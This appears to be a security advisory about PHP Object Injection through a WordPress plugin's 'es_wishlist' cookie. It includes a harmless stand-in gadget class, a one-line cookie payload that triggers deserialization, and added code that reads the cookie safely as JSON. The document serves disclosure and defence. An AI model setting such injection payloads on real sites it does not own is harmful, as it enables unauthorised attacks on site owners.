Description

The plugin unserializes user input from some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog.

To simulate a gadget chain, put the following code in a plugin:
<?php
// Stand-in for a gadget chain: __wakeup() runs only when the plugin passes the
// cookie value to unserialize(), so the message proves the injection point exists.
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}
Then run the command below in the browser's developer console while visiting the blog as an unauthenticated user, and reload the page to see the "Arbitrary deserialization" message.
document.cookie='es_wishlist=O:4:"Evil":0:{}'
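As an added example, not part of the advisory or of the plugin's own code, the following shows how a wishlist cookie can be read without ever letting the client choose a PHP class to instantiate. The cookie name es_wishlist comes from the PoC above; the function names, the assumption that the cookie holds a flat list of post IDs, and the JSON migration are all assumptions.

```php
<?php
// Added example, not the plugin's code. Assumes the wishlist cookie holds a
// flat list of integer post IDs; adjust the validation to the real shape.

/**
 * Read the es_wishlist cookie without instantiating client-chosen classes.
 * Returns an array of post IDs, or an empty array when the cookie is missing
 * or malformed (including the O:4:"Evil":0:{} payload from the advisory).
 */
function read_wishlist_cookie(): array {
    if (!isset($_COOKIE['es_wishlist']) || !is_string($_COOKIE['es_wishlist'])) {
        return [];
    }
    $raw = wp_unslash($_COOKIE['es_wishlist']); // WordPress adds slashes to superglobals

    // Preferred format: JSON. With $assoc = true, json_decode() only ever builds
    // arrays and scalars, so no __wakeup()/__destruct() gadget can be reached.
    $data = json_decode($raw, true, 2);
    if (!is_array($data)) {
        // Legacy cookies written with serialize(): refuse every class. An "O:"
        // payload then becomes __PHP_Incomplete_Class (no magic methods run)
        // and fails the is_array() check below.
        $data = @unserialize($raw, ['allowed_classes' => false]);
        if (!is_array($data)) {
            return [];
        }
    }

    // Accept only positive integers; drop strings, nested arrays and objects.
    $ids = [];
    foreach ($data as $item) {
        if (is_int($item) && $item > 0) {
            $ids[] = $item;
        } elseif (is_string($item) && ctype_digit($item) && (int) $item > 0) {
            $ids[] = (int) $item;
        }
    }
    return array_values(array_unique($ids));
}

// Write side: emit JSON only, so unserialize() is never needed for new cookies.
function write_wishlist_cookie(array $post_ids): void {
    $post_ids = array_values(array_filter(array_map('intval', $post_ids), fn($id) => $id > 0));
    setcookie('es_wishlist', wp_json_encode($post_ids), [
        'expires'  => time() + 30 * DAY_IN_SECONDS,
        'path'     => COOKIEPATH,
        'domain'   => COOKIE_DOMAIN,
        'secure'   => is_ssl(),
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}
```

Fed the advisory's cookie value, read_wishlist_cookie() returns an empty array and the Evil class's __wakeup() is never invoked, because __PHP_Incomplete_Class carries no magic methods.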